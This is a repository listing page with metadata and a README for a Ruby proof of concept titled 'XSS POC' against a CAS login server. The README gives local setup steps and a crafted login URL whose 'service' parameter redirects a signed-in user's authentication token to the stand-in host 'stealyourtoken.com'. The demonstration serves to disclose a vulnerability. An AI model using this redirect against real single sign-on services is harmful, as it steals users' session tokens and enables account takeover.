https://github.com/gregmolnar/cas-client-example
https://github.com/gregmolnar/cas-client-example
Last synced: 15 days ago
JSON representation
- Host: GitHub
- URL: https://github.com/gregmolnar/cas-client-example
- Owner: gregmolnar
- Created: 2014-08-10T19:26:55.000Z (almost 12 years ago)
- Default Branch: master
- Last Pushed: 2014-08-11T09:36:19.000Z (almost 12 years ago)
- Last Synced: 2025-03-02T01:18:37.761Z (over 1 year ago)
- Language: Ruby
- Size: 371 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# XSS POC
Open the client folder in a terminal and run `bundle` than enter `rackup`.
In another terminal go to the server folder and run `bundle` than enter `bundle exec rubycas-server -c config.yml`.
Open `http://localhost:7777/login?service=http://stealyourtoken.com` in a browser and login with test/test. It will redirect you to `stealyourtoken.com` with your token.